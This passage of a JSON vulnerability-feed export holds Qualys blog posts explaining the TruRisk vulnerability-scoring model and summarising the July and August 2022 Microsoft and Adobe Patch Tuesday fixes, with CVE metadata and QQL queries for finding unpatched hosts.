Vulnerabilities with a higher EPSS score are ranked higher.\n\nFigure 8: Contributing factors to Qualys TruRisk Scores\n\n### How Does Qualys TruRisk Compare Against CVSS and EPSS?\n\nAs customers adopt Qualys TruRisk to address their prioritization needs they want to know how CVSS and EPSS and TruRisk compare.\n\nQualys TruRisk is hyper focused on three attributes: exploit availability, evidence of exploitation in the wild, and likelihood of exploitation. This helps organizations focus on the highest risk vulnerabilities.\n\nQualys TruRisk rates less than 1% of vulnerabilities as critical, and less than 7% of vulnerabilities as high. This drastically reduces the number of vulnerabilities (up to 85% fewer compared to CVSS which ranks 51% of vulnerabilities high or critical) that organizations need to focus on to reduce risk. See Fig. 9.\n\nClearly organizations need to remediate other vulnerabilities as well. However, when deciding where to begin, we recommend starting with vulnerabilities that have a TruRisk-QDS risk score of 70 or higher. \n\n### **Qualys Vulnerability Score (QVS) vs CVSS**\n\nFigure 9: Distribution of TruRisk (QVS) Scores vs CVSS\n\n### **Qualys TruRisk vs EPSS**\n\nThe following figure (Fig. 10) shows the distribution of EPSS scores with Qualys Vulnerability Scores (QVS) and CISA known vulnerabilities. QVS scores consistently place vulnerabilities with evidence of exploitation, such as CISA known vulnerabilities, in a higher score range even if the EPSS score is low as annotated in the figure below.\n\nFigure 10: EPSS Score vs TruRisk (QVS) Score\n\n### **Qualys TruRisk (QVS) vs CISA KEV**\n\nEvidence of vulnerability exploitation from sources such as a CISA KEV and other threat intelligence sources tracked by the Qualys research team play a key role in determining the risk of a vulnerability.\n\nAs seen below, vulnerabilities that appear in CISA Known Exploited Vulnerabilities are consistently scored higher (QVS scores of 90 or higher) by the Qualys TruRisk algorithm. (fig. 11).\n\nFigure 11: CISA Known Vulnerabilities distributed across QVS score.\n\nLet's take the example of CVE-2021-36942 (the Windows LSA Spoofing Vulnerability). It is rated at 5.3 by the National Vulnerability Database (NVD), but it\u2019s actively exploited today by malware groups and threat actors. The exploit code maturity is weaponized, making it easy for attackers to exploit the vulnerability to compromise and infect systems). Qualys TruRisk ranks CVE-2021-36942 vulnerability as critical given its exploit availability and evidence of exploitation in the wild.\n\n\n\n### **How to Interpret Qualys TruRisk Scores**\n\nQualys TruRisk builds the vulnerability risk profile of vulnerabilities, assets, and asset groups by using the following three risk scores:\n\n**Qualys Vulnerability Score (QVS)** \u2013 QVS is assessed at each CVE level based on the external threat and exploit intelligence factors listed above. It is also computed for vulnerabilities that don\u2019t have Qualys vulnerability detection signatures (QIDs). These QVS scores can be individually queried for insights from our [dedicated API endpoint](<https://blog.qualys.com/product-tech/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>).\n\n**Qualys Detection Score (QDS)** \u2013 QDS is assessed at each QID level. This is the score customers need to focus on for their vulnerability prioritization needs. **QDS builds on the QVS score by adding two key aspects**. Some QIDs can be mapped to multiple CVEs. QDS selects the highest QVS of all associated CVEs to that QID. Next, QDS accounts for any compensating/mitigation controls that are applied to an asset to reduce the risk score for a given vulnerability. For example, QDS will reduce the risk of a Remote Desktop Protocol (RDP) vulnerability if RDP is disabled.\n\nQDS/QVS Range| Description \n---|--- \n>=95| CVSS critical, exploited in the wild, has weaponized exploit available, trending risk on social media, dark web. \n90-95| CVSS critical, weaponized exploit available, and evidence of exploitation by malware, threat actors/ransomware groups \n80-89| CVSS Critical, weaponized exploit available, but no evidence of exploitation. \nCVSS Critical with evidence of exploitation, but mitigation in place. \n70-79| CVSS High, weaponized exploit available, but no evidence of exploitation \n60-69| CVSS critical, no exploits available \n50-60| CVSS High, a Proof of Concept (PoC) exploit is available \n40-50| CVSS High, no exploit available \n30-39| CVSS Medium, a PoC exploit is available \n1-30| CVSS Low vulnerabilities, low risk of exploitation \n \n### **Asset Risk Score (ARS) **\n\nQualys TruRisk\u2019s next type of risk score allows organizations to identify the riskiest assets in their organization. To assess the risk an asset poses to an organization, the** Asset Risk Score** considers multiple factors.\n\nThe primary factor considered by ARS is Asset Criticality, ie, what risk the asset poses based on its business value. For example: Is the asset part of a production system, a system hosting a production database, or is it purely an internal system used for development and test purposes. Production assets should be rated higher than test systems.\n\nQualys TruRisk determines the business criticality of the asset using multiple approaches, including: \n\n * **Manual** **Ratings **\u2013 TruRisk allows users to set the criticality of the system by using asset tags \n * **Synchronization with CMDB** \u2013 Most enterprises store business criticality information for assets in a configuration management database. Qualys automatically maps to CMDB data to determine the criticality of the system \n * **API\u2019s \u2013 **Using [Qualys APIs for Asset Management and Tagging](<https://www.qualys.com/docs/qualys-asset-management-tagging-api-v2-user-guide.pdf>), users can assign business criticality to an asset \n\nFinally, TruRisk analyzes the vulnerabilities found on the system and determines the asset\u2019s risk based on the QDS scores of the vulnerabilities on an asset by a clearly defined formula called the Asset Risk Score formula.\n\n### **Asset Risk Score Formula**\n\nThe Asset Risk Score (ARS) is calculated using the following formula: \n \n \n ARS Score = ACS Score * [wc * Avg (QDS for Critical Vuln) * f (Critical vuln count) + \n \n wh * Avg (QDS for High Vuln) * f (High vuln count) + \n \n wh * Avg (QDS for Medium Vuln) * f (Medium vuln count) + \n \n wh * Avg (QDS for Low Vuln) * f (Low vuln count)] * I(External) \n\nIn the above formula, **_ACS _**is Asset Criticality Score, **_w__**are the weights fine-tuned by TruRisk algorithm to multiply each of the severity, function **_f_**_ ()_, is a non-linear function that increases exponentially as number of vulnerabilities increases. Also, the factor **_I(External)_** is for the case where an asset is external facing or discoverable by Shodan. This factor increases the score appropriately for external facing assets.\n\nARS Range| Severity| Description \n---|---|--- \n850-1000| Critical| Critical asset with multiple critical or high vulnerabilities \n700-849| High| High value asset with multiple number of critical or high vulnerabilities or is exposed to the internet \n500-699| Medium| Moderate value asset with critical or high vulnerabilities \n0-499| Low| Low value asset with multiple vulnerabilities \n \n### Conclusion\n\nQualys TruRisk offers organizations a comprehensive approach to risk prioritization by considering multiple factors such as vulnerability exploitation, presence of compensating controls, asset criticality, its location (internal or external) to name a few to paint an accurate picture of organization\u2019s TruRisk (pun intended). In this blog we did a deep-dive into one aspect of TruRisk (vulnerability prioritization) and showcased how it\u2019s better than existing models. This blog is the first of series of blogs around TruRisk, and in subsequent blogs we will do a similar deep-dives into other aspects of TruRisk for e.g. asset risk, asset group risk, misconfigurations and many more to help organizations prioritize better based on risk.\n\nWith Qualys TruRisk we have introduced foundational building blocks for major cyber risk initiatives like peer benchmarking, risk score customization, third-party risk assessment, and many more. We are very excited about TruRisk and the benefits it provides to our customers. Stay tuned for more updates.\n\n### Additional Contributors\n\n 1. Shreya Salvi, Data Scientist, Qualys\n 2. Mehul Revankar, VP, Product Management & Engineering for VMDR, Qualys\n 3. Payal Mehrotra, Senior Director, Product Management for CyberRisk, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-10T14:32:29", "type": "qualysblog", "title": "In-Depth Look Into Data-Driven Science Behind Qualys TruRisk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3351", "CVE-2021-31207", "CVE-2021-34523", "CVE-2021-36942", "CVE-2022-30190"], "modified": "2022-10-10T14:32:29", "id": "QUALYSBLOG:9E3CACCA2916D132C2D630A8C15119F3", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-15T23:58:32", "description": "# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 84 vulnerabilities (aka flaws) in the July 2022 update, including four (4) vulnerabilities classified as **_Critical_** as they allow Remote Code Execution (RCE). This month's Patch Tuesday cumulative Windows update includes the fix for one (1) actively exploited zero-day vulnerability ([CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)). Earlier this month, July 6, 2022, Microsoft also released two (2) Microsoft Edge (Chromium-Based) security updates as well.\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege, Information Disclosure, Microsoft Edge (Chromium-based), Remote Code Execution (RCE), Security Feature Bypass, and Tampering.\n\nMany of the vulnerabilities patched this month relate to remote code execution, but there are no reports of active exploitation (in the wild) except for [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>)[CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), a Windows CSRSS Elevation of Privilege Vulnerability.\n\n## The July 2022 Microsoft vulnerabilities are classified as follows: \n\n\n\n [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/07/13/microsoft-patches-84-vulnerabilities-including-one-zero-day-and-four-critical-in-the-july-2022-patch-tuesday/>)\n\n* * *\n\n# **Notable Microsoft Vulnerabilities Patched**\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>) | Windows CSRSS Elevation of Privilege Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nElevation of Privilege - Important - An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. (Article [5015874](<https://support.microsoft.com/help/5015874>))\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**\n\n* * *\n\n# **Microsoft Critical Vulnerability Highlights**\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>) covers multiple Microsoft product families, including Azure, Browser, ESU, Microsoft Dynamics, Microsoft Office, System Center, and Windows.\n\nA total of 63 unique Microsoft products/versions are affected.\n\nDownloads include Monthly Rollup, Security Only, and Security Updates.\n\n* * *\n\n### [CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>) | Windows Graphics Component Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nAn attacker would have to convince a targeted user to connect to a malicious RDP server. Upon connecting, the malicious server could execute code on the victim's system in the context of the targeted user.\n\nWindows 7 Service Pack 1 or Windows Server 2008 R2 Service Pack 1 are only affected by this vulnerability if either RDP 8.0 or RDP 8.1 is installed. If you do not have either of these versions of RDP installed on Windows 7 SP1 or Window Server 2008 R2 SP1, then you are not affected by this vulnerability.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) | Windows Network File System Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE).\n\nSuccessful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>) | Windows Network File System Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.5/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to win a race condition.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n# **Microsoft Last But Not Least**\n\nEarlier in July, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities [CVE-2022-2294](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2294>) and [CVE-2022-2295](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2295>). The vulnerability assigned to each of these CVEs is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. Please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>) for more information.\n\n* * *\n\n# **Adobe Security Bulletins and Advisories**\n\nAdobe released four (4) [advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 27 vulnerabilities affecting Adobe Acrobat, Character Animator, Photoshop, Reader, and RoboHelp applications. Of these 27 vulnerabilities, 18 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**; ranging in severity from a CVSS score of 6.5/10 to 7.8/10, as summarized below.\n\n\n\n* * *\n\n### [APSB22-10](<https://helpx.adobe.com/security/products/robohelp/apsb22-10.html>) | Security update available for RoboHelp\n\nThis update resolves one (1) [**_Important_** ](<https://helpx.adobe.com/security/severity-ratings.html>)vulnerability.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for RoboHelp. This update resolves a vulnerability rated [important](<https://helpx.adobe.com/security/severity-ratings.html>). Successful exploitation could lead to arbitrary code execution in the context of current user. \n\n* * *\n\n### [APSB22-32](<https://helpx.adobe.com/security/products/acrobat/apsb22-32.html>) | Security update available for Adobe Acrobat and Reader\n\nThis update resolves 22 vulnerabilities; 15 **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and seven (7) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**.\n\n_**[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 2**_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>), and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak. \n\n* * *\n\n### [APSB22-34](<https://helpx.adobe.com/security/products/character_animator/apsb22-34.html>) | Security Updates Available for Adobe Character Animator\n\nThis update resolves two (2) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>) _**vulnerabilities.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Character Animator for Windows and macOS. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution.\n\n* * *\n\n### [APSB22-35](<https://helpx.adobe.com/security/products/photoshop/apsb22-35.html>) | Security update available for Adobe Photoshop\n\nThis update resolves two (2) vulnerabilities; one (1) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and one (1) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Photoshop for Windows and macOS. This update resolves a [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability and an [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability. Successful exploitation could lead to arbitrary code execution and memory leak. \n\n* * *\n\n* * *\n\n# Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) \n\n\n\n* * *\n\n# Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches for this Patch Tuesday:\n \n \n ( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) \n\n\n\n [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n* * *\n\n# Qualys Monthly Webinar Series \n\n\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month's Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management. \n\n* * *\n\n### **Join the webinar**\n\n## **This Month in Vulnerabilities & Patches**\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-12T20:09:23", "type": "qualysblog", "title": "July 2022 Patch Tuesday | Microsoft Releases 84 Vulnerabilities with 4 Critical, plus 2 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 27 Vulnerabilities with 18 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-30190", "CVE-2022-30221"], "modified": "2022-07-12T20:09:23", "id": "QUALYSBLOG:65C282BB0F312A3AD8A043024FD3D866", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-14T00:03:27", "description": "# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 121 vulnerabilities (aka flaws) in the August 2022 update, including 17 vulnerabilities classified as **_Critical_** as they allow Elevation of Privilege (EoP) and Remote Code Execution (RCE). This month's Patch Tuesday fixes two (2) zero-day vulnerabilities, with one (1) actively exploited***** in attacks ([CVE-2022-34713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713>)*****,[ CVE-2022-30134](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30134>)). Earlier this month, August 5, 2022, Microsoft also released 20 Microsoft Edge (Chromium-Based) updates addressing Elevation of Privilege (EoP), Remote Code Execution (RCE), and Security Feature Bypass with severities of Low, Moderate, and Important respectively.\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege (EoP), Information Disclosure, Microsoft Edge (Chromium-based), Remote Code Execution (RCE), Security Feature Bypass, and Spoofing.\n\n## **The August 2022 Microsoft vulnerabilities are classified as follows:**\n\n\n\n [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/08/10/microsoft-patches-121-vulnerabilities-with-two-zero-days-and-17-critical-plus-20-microsoft-edge-chromium-based-in-august-2022-patch-tuesday/>)\n\n# **Notable Microsoft Vulnerabilities Patched**\n\nA vulnerability is classified as a zero-day if it is publicly disclosed or actively exploited with no official fix available.\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-34713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713>) | Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nIn May, Microsoft released a [blog](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) giving guidance for a vulnerability in MSDT and released updates to address it shortly thereafter. Public discussion of a vulnerability can encourage further scrutiny on the component, both by Microsoft security personnel as well as their research partners. _This CVE is a variant of the vulnerability publicly known as Dogwalk._\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**\n\n>  Qualys director of vulnerability and threat research, [Bharat Jogi](<https://blog.qualys.com/author/bharat_jogi>), said DogWalk had actually been reported back in 2019 but at the time was not thought to be dangerous as it required \u201csignificant user interaction to exploit,\u201d and there were other mitigations in place.\n> \n> - _Excerpt from [Surge in CVEs as Microsoft Fixes Exploited Zero Day Bug](<https://www.infosecurity-magazine.com/news/surge-cves-microsoft-fixes/>)_\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-30134](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30134>) | Microsoft Exchange Information Disclosure Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.6/10.\n\nThis vulnerability requires that a user with an affected version of Exchange Server access a malicious server. An attacker would have to host a specially crafted server share or website. An attacker would have no way to force users to visit this specially crafted server share or website, but would have to convince them to visit the server share or website, typically by way of an enticement in an email or chat message. For more information, see [Exchange Server Sup](<https://aka.ms/ExchangeEPDoc>)[port for Windows Extended Protection](<https://microsoft.github.io/CSS-Exchange/Security/Extended-Protection/>) and/or [The Exchange Blog](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Unlikely_**\n\n* * *\n\n## **Security Feature Bypass Vulnerabilities Addressed**\n\nThese are **standalone security updates**. These packages must be installed in addition to the normal security updates to be protected from this vulnerability.\n\nThese security updates have a Servicing Stack Update prerequisite for specific KB numbers. The packages have a built-in pre-requisite logic to ensure the ordering.\n\nMicrosoft customers should ensure they have installed the latest Servicing Stack Update before installing these standalone security updates. See [ADV990001 | Latest Servicing Stack Updates](<https://msrc.microsoft.com/update-guide/security-guidance/advisory/ADV990001>) for more information.\n\nAn attacker who successfully exploited either of these three (3) vulnerabilities could bypass Secure Boot.\n\n### CERT/CC: [CVE-2022-34301](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34301>) Eurosoft Boot Loader Bypass\n\n### CERT/CC: [CVE-2022-34302](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34302>) New Horizon Data Systems Inc Boot Loader Bypass\n\n### CERT/CC: [CVE-2022-34303](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34303>) Crypto Pro Boot Loader Bypass\n\nAt the time of publication, a CVSSv3.1 score has not been assigned.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Like_**ly\n\n* * *\n\n## **Microsoft Critical and Important Vulnerability Highlights**\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>) covers multiple Microsoft product families, including Azure, Browser, Developer Tools, [Extended Security Updates (ESU)](<https://docs.microsoft.com/en-us/lifecycle/faq/extended-security-updates>), Exchange Server, Microsoft Office, System Center,, and Windows.\n\nA total of 86 unique Microsoft products/versions are affected, including .NET, Azure, Edge (Chromium-based), Excel, Exchange Server (Cumulative Update), Microsoft 365 Apps for Enterprise, Office, Open Management Infrastructure, Outlook, and System Center Operations Manager (SCOM), Visual Studio, Windows Desktop, and Windows Server.\n\nDownloads include IE Cumulative, Monthly Rollup, Security Only, and Security Updates.\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-35766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35766>), [CVE-2022-35794](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35794>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to win a race condition.\n\nAn unauthenticated attacker could send a specially crafted connection request to a RAS server, which could lead to remote code execution (RCE) on the RAS server machine.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-30133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30133>), [CVE-2022-35744](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35744>) | Windows Point-to-Point Protocol (PPP) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nThis vulnerability can only be exploited by communicating via Port 1723. As a temporary workaround prior to installing the updates that address this vulnerability, you can block traffic through that port thus rendering the vulnerability unexploitable. **Warning**: Disabling Port 1723 could affect communications over your network.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-34691](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34691>) | Active Directory Domain Services Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nThis vulnerability can only be exploited by communicating via Port 1723. As a temporary workaround An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege to System.\n\nPlease see [Certificate-based authentication changes on Windows domain controllers](<https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16>) for more information and ways to protect your domain.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-33646](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33646>) | Azure Batch Node Agent Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.0/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to prepare the target environment to improve exploit reliability.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n## **Microsoft Edge | Last But Not Least**\n\nEarlier in August, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities [CVE-2022-33636](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33636>), [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2294>)[CVE-2022-33649](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33649>), and [CVE-2022-35796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35796>). The vulnerability assigned to each of these CVEs is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. For more information, please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>).\n\n### [CVE-2022-33649](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33649>) | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 9.6/10.\n\nAn attacker could host a specially crafted website designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action, typically by an enticement in an email or instant message, or by getting the user to open an attachment sent through 